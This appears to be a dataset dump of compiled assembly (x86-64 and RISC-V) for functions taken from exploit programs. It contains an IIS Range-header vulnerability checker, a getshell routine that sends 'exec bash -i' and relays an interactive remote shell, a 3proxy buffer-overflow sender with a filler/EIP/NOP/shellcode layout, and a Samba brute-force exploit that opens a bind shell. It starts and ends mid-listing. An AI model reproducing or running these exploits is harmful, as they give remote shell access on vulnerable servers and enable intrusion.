__stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl g_aug_volatile_5275 .data .align 4 .type g_aug_volatile_5275, @object .size g_aug_volatile_5275, 4 g_aug_volatile_5275: .long 10 .section .rodata.cst16,"aM",@progbits,16 .align 16 .LC9: .quad 6073139484287059271 .quad 724288090028331092 .align 16 .LC10: .quad 6073139484287059271 .quad 724289189539958868 .align 16 .LC11: .quad 8391085966155280200 .quad 7953728620040971893 .align 16 .LC12: .quad 7310601557483611495 .quad 3761693372623895923 .align 16 .LC13: .quad 3977583576072075062 .quad 3832904342842980656 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_36773.c_main_aug_v3_6.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC2: .string "\n Usage: %s <ip of server> \n" .align 3 .LC3: .string "[*] Audit Started" .align 3 .LC4: .string "Microsoft" .align 3 .LC5: .string "[*] NOT IIS" .align 3 .LC6: .string "Requested Range Not Satisfiable" .align 3 .LC7: .string "[!!] Looks VULN" .align 3 .LC8: .string "The request has an invalid header name" .align 3 .LC9: .string "[*] Looks Patched" .align 3 .LC10: .string "[*] Unexpected response, cannot discern patch status" .align 3 .LC1: .string "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" .align 3 .LC0: .string "GET / HTTP/1.0\r\n\r\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-1184 lla a5,.LC1 lla a4,.LC0 sd s3,1144(sp) la s3,__stack_chk_guard ld a3, 0(s3) sd a3, 1128(sp) li a3, 0 lhu t2,16(a4) lbu t0,18(a4) ld t6,0(a5) ld t5,8(a5) ld t4,16(a5) ld t3,24(a5) sd s0,1168(sp) sd s1,1160(sp) ld s0,8(a4) ld s1,0(a4) ld a7,40(a5) ld a6,48(a5) ld a2,56(a5) lw a3,64(a5) lbu a4,68(a5) ld t1,32(a5) lw a5,.LANCHOR0 addiw a5,a5,1 sd s2,1152(sp) sd s0,16(sp) sw a5,.LANCHOR0,s2 sd ra,1176(sp) sd s4,1136(sp) sd s1,8(sp) sh t2,24(sp) sb t0,26(sp) sd t6,32(sp) sd t5,40(sp) sd t4,48(sp) sd t3,56(sp) sd t1,64(sp) li a5,2 sd a7,72(sp) sd a6,80(sp) sd a2,88(sp) sw a3,96(sp) sb a4,100(sp) mv s0,a1 beq a0,a5,.L11 lla a0,.LC3 call puts@plt ld a0,8(s0) addi s4,sp,8 addi s1,sp,104 call connect_to_server@plt mv s2,a0 mv a0,s4 call strlen@plt mv a2,a0 mv a1,s4 mv a0,s2 call write@plt mv a1,s1 li a2,1023 mv a0,s2 call read@plt lla a1,.LC4 mv a0,s1 call strstr@plt beq a0,zero,.L12 .L4: ld a0,8(s0) addi s2,sp,32 call connect_to_server@plt mv s0,a0 mv a0,s2 call strlen@plt mv a2,a0 mv a1,s2 mv a0,s0 call write@plt mv a1,s1 li a2,1023 mv a0,s0 call read@plt lla a1,.LC6 mv a0,s1 call strstr@plt beq a0,zero,.L5 lla a0,.LC7 call puts@plt li a0,1 call exit@plt .L6: li a0,0 .L3: ld a4, 1128(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L13 ld ra,1176(sp) ld s0,1168(sp) ld s1,1160(sp) ld s2,1152(sp) ld s3,1144(sp) ld s4,1136(sp) addi sp,sp,1184 jr ra .L5: lla a1,.LC8 mv a0,s1 call strstr@plt beq a0,zero,.L7 lla a0,.LC9 call printf@plt j .L6 .L12: lla a0,.LC5 call puts@plt li a0,1 call exit@plt j .L4 .L11: ld a1,0(a1) lla a0,.LC2 call printf@plt li a0,1 j .L3 .L7: lla a0,.LC10 call printf@plt j .L6 .L13: call __stack_chk_fail@plt .size main, .-main .globl g_aug_volatile_5275 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_5275, @object .size g_aug_volatile_5275, 4 g_aug_volatile_5275: .word 10 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_15285.c_send_message_aug_v3_3
.file "extr_15285.c_send_message_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "127.0.0.1" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*] Something went wrong sending.\n" .text .p2align 4 .globl send_message .type send_message, @function send_message: .LFB0: .cfi_startproc endbr64 pushq %r13 .cfi_def_cfa_offset 16 .cfi_offset 13, -16 movl $40, %edx pushq %r12 .cfi_def_cfa_offset 24 .cfi_offset 12, -24 pushq %rbp .cfi_def_cfa_offset 32 .cfi_offset 6, -32 movl %esi, %ebp xorl %esi, %esi pushq %rbx .cfi_def_cfa_offset 40 .cfi_offset 3, -40 movq %rdi, %rbx subq $136, %rsp .cfi_def_cfa_offset 176 movq %fs:40, %rax movq %rax, 120(%rsp) xorl %eax, %eax leaq 32(%rsp), %r13 leaq 80(%rsp), %r12 movq %r13, %rdi call memset@PLT movl RECVPORT(%rip), %edi call htons@PLT leaq .LC0(%rip), %rdi movl %eax, 64(%rsp) movl AF_INET(%rip), %eax movl %eax, 60(%rsp) call inet_addr@PLT xorl %esi, %esi movl $40, %edx movq %r12, %rdi movl %eax, 56(%rsp) call memset@PLT xorl %edx, %edx movq %r12, %rsi movl %ebp, %edi movabsq $4294967336, %rax movq %r13, 96(%rsp) movq %rax, 80(%rsp) leaq 8(%rsp), %rax movq %rax, 24(%rsp) leaq 16(%rsp), %rax movq %rbx, 8(%rsp) movl $8, 16(%rsp) movq %rax, 88(%rsp) call sendmsg@PLT testl %eax, %eax jle .L6 .L1: movq 120(%rsp), %rax subq %fs:40, %rax jne .L7 addq $136, %rsp .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbx .cfi_def_cfa_offset 32 popq %rbp .cfi_def_cfa_offset 24 popq %r12 .cfi_def_cfa_offset 16 popq %r13 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L6: .cfi_restore_state leaq .LC1(%rip), %rdi call printf@PLT movl $-1, %edi call exit@PLT jmp .L1 .L7: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size send_message, .-send_message .globl RECVPORT .bss .align 4 .type RECVPORT, @object .size RECVPORT, 4 RECVPORT: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_15285.c_send_message_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "127.0.0.1" .align 3 .LC1: .string "[*] Something went wrong sending.\n" .text .align 1 .globl send_message .type send_message, @function send_message: addi sp,sp,-160 sd s0,144(sp) sd s4,112(sp) addi s0,sp,24 la s4,__stack_chk_guard li a2,40 sd s2,128(sp) sd s3,120(sp) ld a5, 0(s4) sd a5, 104(sp) li a5, 0 mv s2,a0 mv s3,a1 mv a0,s0 li a1,0 sd ra,152(sp) sd s1,136(sp) call memset@plt lla s1,.LANCHOR0 lw a0,0(s1) call htons@plt lw a5,4(s1) mv a4,a0 lla a0,.LC0 sw a4,56(sp) sw a5,52(sp) addi s1,sp,64 call inet_addr@plt mv a5,a0 li a2,40 li a1,0 mv a0,s1 sw a5,48(sp) call memset@plt li a5,1 slli a5,a5,32 addi a5,a5,40 sd a5,64(sp) li a5,8 sw a5,8(sp) mv a5,sp sd a5,16(sp) li a2,0 addi a5,sp,8 mv a1,s1 mv a0,s3 sd s0,80(sp) sd s2,0(sp) sd a5,72(sp) call sendmsg@plt ble a0,zero,.L6 .L1: ld a4, 104(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L7 ld ra,152(sp) ld s0,144(sp) ld s1,136(sp) ld s2,128(sp) ld s3,120(sp) ld s4,112(sp) addi sp,sp,160 jr ra .L6: lla a0,.LC1 call printf@plt li a0,-1 call exit@plt j .L1 .L7: call __stack_chk_fail@plt .size send_message, .-send_message .globl RECVPORT .globl AF_INET .bss .align 2 .set .LANCHOR0,. + 0 .type RECVPORT, @object .size RECVPORT, 4 RECVPORT: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22035.c_getshell_aug_v3_5
.file "extr_22035.c_getshell_aug_v3_5.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string " [*] Executed shell successfully !\n\n" .align 8 .LC1: .string "uname -a; id; export TERM=vt100; exec bash -i\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC2: .string "%s" .text .p2align 4 .globl getshell .type getshell, @function getshell: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 movl $1024, %edx xorl %esi, %esi leaq .LC2(%rip), %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 leaq .LC1(%rip), %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edi, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 leal 1(%rbp), %r13d subq $1064, %rsp .cfi_def_cfa_offset 1120 movq %fs:40, %rax movq %rax, 1048(%rsp) xorl %eax, %eax leaq 16(%rsp), %r14 leaq 12(%rsp), %rbx movq %r14, %rdi call memset@PLT movl stdout(%rip), %edi leaq .LC0(%rip), %rsi call fprintf@PLT movq %r12, %rdi call strlen@PLT xorl %ecx, %ecx movq %r12, %rsi movl %ebp, %edi movl %eax, %edx call send@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L2: movl STDIN_FILENO(%rip), %edi movq %rbx, %rsi call FD_ISSET@PLT testq %rax, %rax jne .L16 .L4: movl stdout(%rip), %edi call fflush@PLT movq %rbx, %rdi call FD_ZERO@PLT movq %rbx, %rsi movl %ebp, %edi call FD_SET@PLT movl STDIN_FILENO(%rip), %edi movq %rbx, %rsi call FD_SET@PLT xorl %r8d, %r8d xorl %ecx, %ecx xorl %edx, %edx movq %rbx, %rsi movl %r13d, %edi call select@PLT movq %rbx, %rsi movl %ebp, %edi call FD_ISSET@PLT testq %rax, %rax je .L2 movl $1024, %edx movq %r14, %rsi movl %ebp, %edi call read@PLT movslq %eax, %r12 testl %r12d, %r12d jle .L17 .L3: movq %r14, %rsi movq %r15, %rdi movb $0, 16(%rsp,%r12) call printf@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L16: movl STDIN_FILENO(%rip), %edi movl $1024, %edx movq %r14, %rsi call read@PLT movl %eax, %edx testl %eax, %eax jle .L4 cltq movq %r14, %rsi movl %ebp, %edi movb $0, 16(%rsp,%rax) call write@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L17: xorl %edi, %edi call exit@PLT jmp .L3 .cfi_endproc .LFE0: .size getshell, .-getshell .globl stdout .bss .align 4 .type stdout, @object .size stdout, 4 stdout: .zero 4 .globl STDIN_FILENO .align 4 .type STDIN_FILENO, @object .size STDIN_FILENO, 4 STDIN_FILENO: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_22035.c_getshell_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string " [*] Executed shell successfully !\n\n" .align 3 .LC1: .string "uname -a; id; export TERM=vt100; exec bash -i\n" .align 3 .LC2: .string "%s" .text .align 1 .globl getshell .type getshell, @function getshell: addi sp,sp,-1104 la a5,__stack_chk_guard sd s5,1048(sp) addi s5,sp,8 li a2,1024 ld a4, 0(a5) sd a4, 1032(sp) li a4, 0 sd s2,1072(sp) li a1,0 mv s2,a0 mv a0,s5 sd ra,1096(sp) sd s0,1088(sp) sd s1,1080(sp) sd s4,1056(sp) sd s6,1040(sp) sd s3,1064(sp) lla s1,.LANCHOR0 call memset@plt lw a0,0(s1) lla a1,.LC0 addiw s4,s2,1 call fprintf@plt lla a0,.LC1 call strlen@plt mv a2,a0 li a3,0 lla a1,.LC1 mv a0,s2 call send@plt addi s0,sp,4 lla s6,.LC2 j .L4 .L2: lw a0,4(s1) mv a1,s0 call FD_ISSET@plt bne a0,zero,.L16 .L4: lw a0,0(s1) call fflush@plt mv a0,s0 call FD_ZERO@plt mv a1,s0 mv a0,s2 call FD_SET@plt lw a0,4(s1) mv a1,s0 call FD_SET@plt mv a1,s0 li a4,0 li a3,0 li a2,0 mv a0,s4 call select@plt mv a1,s0 mv a0,s2 call FD_ISSET@plt beq a0,zero,.L2 li a2,1024 mv a1,s5 mv a0,s2 call read@plt mv s3,a0 ble a0,zero,.L17 .L3: addi a5,s3,1040 add s3,a5,sp mv a1,s5 mv a0,s6 sb zero,-1032(s3) call printf@plt lw a0,4(s1) mv a1,s0 call FD_ISSET@plt beq a0,zero,.L4 .L16: lw a0,4(s1) mv a1,s5 li a2,1024 call read@plt addi a5,a0,1040 mv a2,a0 add a5,a5,sp mv a1,s5 mv a0,s2 ble a2,zero,.L4 sb zero,-1032(a5) call write@plt j .L4 .L17: li a0,0 call exit@plt j .L3 .size getshell, .-getshell .globl stdout .globl STDIN_FILENO .bss .align 2 .set .LANCHOR0,. + 0 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type STDIN_FILENO, @object .size STDIN_FILENO, 4 STDIN_FILENO: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_3822.c_proxy_connect_aug_v3_3
.file "extr_3822.c_proxy_connect_aug_v3_3.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] attempting to connect: %s:%d.\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "couldn't resolve hostname." .LC2: .string "3proxy connection failed." .section .rodata.str1.8 .align 8 .LC3: .string "[*] successfully connected: %s:%d.\n" .section .rodata.str1.1 .LC4: .string "[*] sending string:" .section .rodata.str1.8 .align 8 .LC5: .string "[+] GET /[FILLERx1064][EIP/\"CALL ESP\"][NOPSx32][SHELLCODE]\\n" .section .rodata.str1.1 .LC6: .string "[+] Host: [FILLERx999]\\n\\n" .LC7: .string "[*] closing connection.\n" .text .p2align 4 .globl proxy_connect .type proxy_connect, @function proxy_connect: .LFB1: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 movq %rdi, %r13 pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 movl %esi, %r12d pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movzwl %r12w, %r12d pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 subq $32, %rsp .cfi_def_cfa_offset 80 movl IPPROTO_TCP(%rip), %edx movl SOCK_STREAM(%rip), %esi movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax movl AF_INET(%rip), %edi leaq 12(%rsp), %r14 call socket@PLT movl %r12d, %edi movl %eax, %ebp movl AF_INET(%rip), %eax movl %eax, 20(%rsp) call htons@PLT movl %r12d, %edx movq %r13, %rsi leaq .LC0(%rip), %rdi movl %eax, 16(%rsp) xorl %eax, %eax call printf@PLT movq %r13, %rdi call inet_addr@PLT movl %eax, 12(%rsp) testl %eax, %eax jne .L15 .L2: movl sig_alarm(%rip), %esi movl SIGALRM(%rip), %edi call signal@PLT movl TIMEOUT(%rip), %edi call alarm@PLT movl $12, %edx movq %r14, %rsi movl %ebp, %edi call connect@PLT testq %rax, %rax jne .L16 .L4: xorl %edi, %edi call alarm@PLT movl %r12d, %edx movq %r13, %rsi xorl %eax, %eax leaq .LC3(%rip), %rdi call printf@PLT movl $1, %edi call sleep@PLT leaq .LC4(%rip), %rdi call puts@PLT leaq .LC5(%rip), %rdi call puts@PLT leaq .LC6(%rip), %rdi call puts@PLT movl tbl(%rip), %edi movl BUFSIZE(%rip), %r12d call getbuf@PLT movl %r12d, %edx movl %ebp, %edi movl %eax, %esi call write@PLT movl $1, %edi call sleep@PLT leaq .LC7(%rip), %rdi call puts@PLT movl %ebp, %edi call close@PLT movq 24(%rsp), %rax subq %fs:40, %rax jne .L17 addq $32, %rsp .cfi_remember_state .cfi_def_cfa_offset 48 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L15: .cfi_restore_state movq %r13, %rdi call gethostbyname@PLT movq %rax, %rbx testq %rax, %rax je .L18 .L3: leaq 12(%rsp), %r14 movq (%rbx), %rsi movl $4, %edx movq %r14, %rdi call memcpy@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L16: movl $1, %esi leaq .LC2(%rip), %rdi call printe@PLT jmp .L4 .p2align 4,,10 .p2align 3 .L18: movl $1, %esi leaq .LC1(%rip), %rdi call printe@PLT jmp .L3 .L17: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size proxy_connect, .-proxy_connect .globl tbl .bss .align 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .globl sig_alarm .align 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .globl TIMEOUT .align 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .globl SOCK_STREAM .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl SIGALRM .align 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl BUFSIZE .align 4 .type BUFSIZE, @object .size BUFSIZE, 4 BUFSIZE: .zero 4 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_2449 .align 4 .type g_aug_volatile_2449, @object .size g_aug_volatile_2449, 4 g_aug_volatile_2449: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_3822.c_proxy_connect_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*] attempting to connect: %s:%d.\n" .align 3 .LC1: .string "couldn't resolve hostname." .align 3 .LC2: .string "3proxy connection failed." .align 3 .LC3: .string "[*] successfully connected: %s:%d.\n" .align 3 .LC4: .string "[*] sending string:" .align 3 .LC5: .string "[+] GET /[FILLERx1064][EIP/\"CALL ESP\"][NOPSx32][SHELLCODE]\\n" .align 3 .LC6: .string "[+] Host: [FILLERx999]\\n\\n" .align 3 .LC7: .string "[*] closing connection.\n" .text .align 1 .globl proxy_connect .type proxy_connect, @function proxy_connect: addi sp,sp,-96 sd s0,80(sp) lla s0,.LANCHOR0 lw a2,0(s0) sd s1,72(sp) sd s3,56(sp) mv s1,a0 mv s3,a1 lw a0,8(s0) lw a1,4(s0) sd s4,48(sp) la s4,__stack_chk_guard ld a5, 0(s4) sd a5, 24(sp) li a5, 0 sd ra,88(sp) sd s2,64(sp) sd s5,40(sp) call socket@plt lw a5,8(s0) mv s2,a0 mv a0,s3 sw a5,16(sp) sext.w s3,s3 call htons@plt mv a5,a0 mv a2,s3 mv a1,s1 lla a0,.LC0 sw a5,12(sp) call printf@plt mv a0,s1 call inet_addr@plt sw a0,8(sp) addi s5,sp,8 bne a0,zero,.L15 .L2: lw a1,12(s0) lw a0,16(s0) call signal@plt lw a0,20(s0) call alarm@plt li a2,12 mv a1,s5 mv a0,s2 call connect@plt bne a0,zero,.L16 .L4: li a0,0 call alarm@plt mv a2,s3 mv a1,s1 lla a0,.LC3 call printf@plt li a0,1 call sleep@plt lla a0,.LC4 call puts@plt lla a0,.LC5 call puts@plt lla a0,.LC6 call puts@plt lw a0,24(s0) call getbuf@plt lw a2,28(s0) mv a1,a0 mv a0,s2 call write@plt li a0,1 call sleep@plt lla a0,.LC7 call puts@plt mv a0,s2 call close@plt ld a4, 24(sp) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L17 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) ld s2,64(sp) ld s3,56(sp) ld s4,48(sp) ld s5,40(sp) li a0,0 addi sp,sp,96 jr ra .L15: mv a0,s1 call gethostbyname@plt mv s5,a0 beq a0,zero,.L18 .L3: ld a1,0(s5) addi s5,sp,8 li a2,4 mv a0,s5 call memcpy@plt j .L2 .L16: li a1,1 lla a0,.LC2 call printe@plt j .L4 .L18: li a1,1 lla a0,.LC1 call printe@plt j .L3 .L17: call __stack_chk_fail@plt .size proxy_connect, .-proxy_connect .globl tbl .globl sig_alarm .globl TIMEOUT .globl SOCK_STREAM .globl SIGALRM .globl IPPROTO_TCP .globl BUFSIZE .globl AF_INET .globl g_aug_volatile_2449 .bss .align 3 .set .LANCHOR0,. + 0 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .type sig_alarm, @object .size sig_alarm, 4 sig_alarm: .zero 4 .type SIGALRM, @object .size SIGALRM, 4 SIGALRM: .zero 4 .type TIMEOUT, @object .size TIMEOUT, 4 TIMEOUT: .zero 4 .type tbl, @object .size tbl, 4 tbl: .zero 4 .type BUFSIZE, @object .size BUFSIZE, 4 BUFSIZE: .zero 4 .type g_aug_volatile_2449, @object .size g_aug_volatile_2449, 4 g_aug_volatile_2449: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_22468.c_main_aug_v3_1
.file "extr_22468.c_main_aug_v3_1.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string " Try `%s -i' for more information.\n\n" .section .rodata.str1.1,"aMS",@progbits,1 .LC1: .string "H:h:S:s:T:t:IiB:b" .section .rodata.str1.8 .align 8 .LC2: .string " **\n ** OK, It's good selection, Attack tries %d times.\n" .align 8 .LC3: .string " ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n" .section .rodata.str1.1 .LC4: .string " [*] Brute-Force mode:\n\n" .section .rodata.str1.8 .align 8 .LC5: .string " |----+----+----+----+----+----+----+----+----+----+----+----+----|" .section .rodata.str1.1 .LC6: .string "\n |" .LC7: .string "|\n\n **\n" .section .rodata.str1.8 .align 8 .LC8: .string " ** Brute-Force exploit failed. Reason is simple.\n **\n" .align 8 .LC9: .string " ** Could not search shellcode's position during %d times.\n" .align 8 .LC10: .string " ** Or, Operating System's target that we attack isn't.\n" .align 8 .LC11: .string " ** OOops ! is server Samba version doubtful ??\n **\n\n" .section .rodata.str1.1 .LC12: .string "=" .LC13: .string "|\n\n" .LC14: .string " [-] Connect Failed.\n\n" .LC15: .string " [+] Shellcode address: %p\n" .LC16: .string " [*] Brute-Force end !!\n\n" .section .rodata.str1.8 .align 8 .LC17: .string " **\n ** Bind shellcode is port 10000.\n" .align 8 .LC18: .string " ** If bindshell port number was changed, change connection port.\n **\n\n" .section .rodata.str1.1 .LC19: .string " [0] Target: %s\n" .LC20: .string " [1] Set socket.\n" .section .rodata.str1.8 .align 8 .LC21: .string " [2] Make shellcode & Send Packet.\n" .section .rodata.str1.1 .LC22: .string " [3] Trying %s:%d.\n" .LC23: .string " [*] Connected to %s:%d.\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 xorl %edx, %edx pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edi, %ebp pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $168, %rsp .cfi_def_cfa_offset 224 movdqa .LC24(%rip), %xmm0 movq %fs:40, %rax movq %rax, 152(%rsp) movl g_aug_volatile_3012(%rip), %eax movw %dx, 144(%rsp) movaps %xmm0, 16(%rsp) pxor %xmm0, %xmm0 movaps %xmm0, 32(%rsp) movaps %xmm0, 48(%rsp) movaps %xmm0, 64(%rsp) movaps %xmm0, 80(%rsp) addl $1, %eax movaps %xmm0, 96(%rsp) movl %eax, g_aug_volatile_3012(%rip) movq plat(%rip), %rax movaps %xmm0, 112(%rsp) movaps %xmm0, 128(%rsp) movl (%rax), %r12d xorl %eax, %eax call banrl@PLT cmpl $1, %ebp jle .L32 .L2: movl $0, 12(%rsp) leaq .LC1(%rip), %r14 leaq .L6(%rip), %r13 movl $0, 8(%rsp) leaq 16(%rsp), %r15 .p2align 4,,10 .p2align 3 .L3: movq %r14, %rdx movq %rbx, %rsi movl %ebp, %edi call getopt@PLT cmpl $-1, %eax je .L33 subl $63, %eax cmpl $53, %eax ja .L3 movslq 0(%r13,%rax,4), %rax addq %r13, %rax notrack jmp *%rax .section .rodata .align 4 .align 4 .L6: .long .L11-.L6 .long .L3-.L6 .long .L3-.L6 .long .L10-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L9-.L6 .long .L8-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L7-.L6 .long .L5-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L10-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L9-.L6 .long .L8-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L3-.L6 .long .L7-.L6 .long .L5-.L6 .section .text.startup .p2align 4,,10 .p2align 3 .L8: movq (%rbx), %rdi call usage@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L9: xorl %esi, %esi movq %r15, %rdi movl $130, %edx call memset@PLT movq optarg(%rip), %rsi movl $129, %edx movq %r15, %rdi call strncpy@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L10: addl $1, 12(%rsp) jmp .L3 .p2align 4,,10 .p2align 3 .L5: movq optarg(%rip), %rdi call atoi@PLT movl %eax, 8(%rsp) cmpl $1, %eax jg .L8 movslq 8(%rsp), %rax salq $4, %rax addq plat(%rip), %rax movl (%rax), %r12d jmp .L3 .p2align 4,,10 .p2align 3 .L7: movq optarg(%rip), %rdi xorl %edx, %edx xorl %esi, %esi call strtoul@PLT movl %eax, %r12d jmp .L3 .L11: movq (%rbx), %rdx movl stderr(%rip), %edi leaq .LC0(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl $-1, %edi call exit@PLT jmp .L3 .p2align 4,,10 .p2align 3 .L33: movl 12(%rsp), %eax movl stdout(%rip), %edi testl %eax, %eax je .L14 movl BRUTE_AT(%rip), %edx leaq .LC2(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC3(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC4(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi leaq .LC5(%rip), %rsi xorl %eax, %eax call fprintf@PLT movl stdout(%rip), %edi xorl %eax, %eax leaq .LC6(%rip), %rsi call fprintf@PLT cmpl $0, BRUTE_AT(%rip) jle .L23 xorl %r15d, %r15d leaq 16(%rsp), %r13 leaq .LC12(%rip), %rbx leaq .LC13(%rip), %r14 .p2align 4,,10 .p2align 3 .L15: movl stdout(%rip), %edi addl $256, %r12d call fflush@PLT movl stdout(%rip), %edi movq %rbx, %rsi xorl %eax, %eax call fprintf@PLT movl ATK_PORT(%rip), %esi movq %r13, %rdi call setsock@PLT xorl %esi, %esi movl %eax, %edi movl %eax, %ebp call re_connt@PLT cmpl $-1, %eax je .L30 .L17: movl %r12d, %esi movl %ebp, %edi call 